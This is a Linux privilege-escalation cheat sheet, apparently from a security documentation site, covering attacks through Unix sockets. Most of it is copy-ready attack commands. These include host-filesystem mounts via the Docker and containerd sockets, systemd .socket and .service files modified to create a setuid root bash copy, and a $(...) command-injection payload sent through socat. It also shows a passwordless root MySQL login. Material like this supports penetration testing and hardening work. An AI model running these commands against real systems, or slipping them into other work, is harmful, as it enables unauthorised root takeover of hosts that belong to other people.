> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Unix Socket Abuse

> Privilege escalation via Unix sockets: writable socket files, socket activation, and exposed service sockets.

## Overview

Unix sockets are inter-process communication endpoints. If a socket is writable or a privileged service listens on one, you can communicate with it to escalate privileges.

***

## Enumerate Unix Sockets

```bash theme={"dark"}
ss -xlp
netstat -a -p --unix 2>/dev/null
find / -type s 2>/dev/null
```

### Find Writable Sockets

```bash theme={"dark"}
find / -type s -writable 2>/dev/null
```

### Check Socket Permissions

```bash theme={"dark"}
ls -la /var/run/*.sock
ls -la /tmp/*.sock
```

***

## Docker Socket

Most common socket privesc. See [Docker / LXD Escape](/linux-privesc/docker-lxd).

### Quick Check

```bash theme={"dark"}
ls -la /var/run/docker.sock
```

If writable:

```bash theme={"dark"}
docker run -v /:/mnt --rm -it alpine chroot /mnt bash
```

Without docker CLI:

```bash theme={"dark"}
curl -s --unix-socket /var/run/docker.sock http://localhost/images/json
curl -s --unix-socket /var/run/docker.sock -X POST \
  -H "Content-Type: application/json" \
  -d '{"Image":"alpine","Cmd":["/bin/sh"],"HostConfig":{"Binds":["/:/mnt"],"Privileged":true}}' \
  http://localhost/containers/create
```

***

## Writable .socket Files (systemd)

```bash theme={"dark"}
find /etc/systemd/system/ -writable -name "*.socket" 2>/dev/null
```

### Inject ExecStartPre

```ini theme={"dark"}
[Socket]
ListenStream=/run/vulnerable.sock
ExecStartPre=/bin/bash -c 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash'
```

```bash theme={"dark"}
systemctl daemon-reload
systemctl restart vulnerable.socket
```

### Create Missing Service

If `.socket` exists but corresponding `.service` is missing:

```bash theme={"dark"}
# Check what service it activates
cat /etc/systemd/system/vulnerable.socket | grep Service
```

Create the missing service:

```ini theme={"dark"}
[Service]
ExecStart=/bin/bash -c 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash'
```

***

## HTTP Sockets

Some services expose HTTP APIs over Unix sockets.

### Connect

```bash theme={"dark"}
curl --unix-socket /var/run/service.sock http://localhost/
curl --unix-socket /var/run/service.sock http://localhost/api/v1/info
```

### Socat

```bash theme={"dark"}
socat - UNIX-CLIENT:/var/run/service.sock
```

### Netcat

```bash theme={"dark"}
nc -U /var/run/service.sock
```

***

## MySQL Socket

```bash theme={"dark"}
ls -la /var/run/mysqld/mysqld.sock
```

Connect without password:

```bash theme={"dark"}
mysql -u root -S /var/run/mysqld/mysqld.sock
```

***

## Containerd Socket

```bash theme={"dark"}
ls -la /run/containerd/containerd.sock
```

If accessible:

```bash theme={"dark"}
ctr -a /run/containerd/containerd.sock image ls
ctr -a /run/containerd/containerd.sock run --rm -t --mount type=bind,src=/,dst=/mnt,options=rbind docker.io/library/alpine:latest shell /bin/sh
chroot /mnt bash
```

***

## Socket Command Injection

If a service reads input from a socket and passes it to a shell:

```bash theme={"dark"}
echo '$(cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash)' | socat - UNIX-CLIENT:/var/run/vulnerable.sock
```

***

## Socket Permissions

| Permission              | Risk                            |
| ----------------------- | ------------------------------- |
| World-writable socket   | Anyone can connect              |
| Group-readable/writable | Group members can connect       |
| Root-owned, no auth     | Relies only on filesystem perms |

***

## Quick Reference

| Socket                            | Privesc                      |
| --------------------------------- | ---------------------------- |
| `/var/run/docker.sock`            | Mount host filesystem → root |
| `/run/containerd/containerd.sock` | Run privileged container     |
| Writable `.socket` file           | Inject ExecStartPre          |
| MySQL socket (no password)        | DB access, potential UDF RCE |
| HTTP API socket                   | Depends on exposed endpoints |
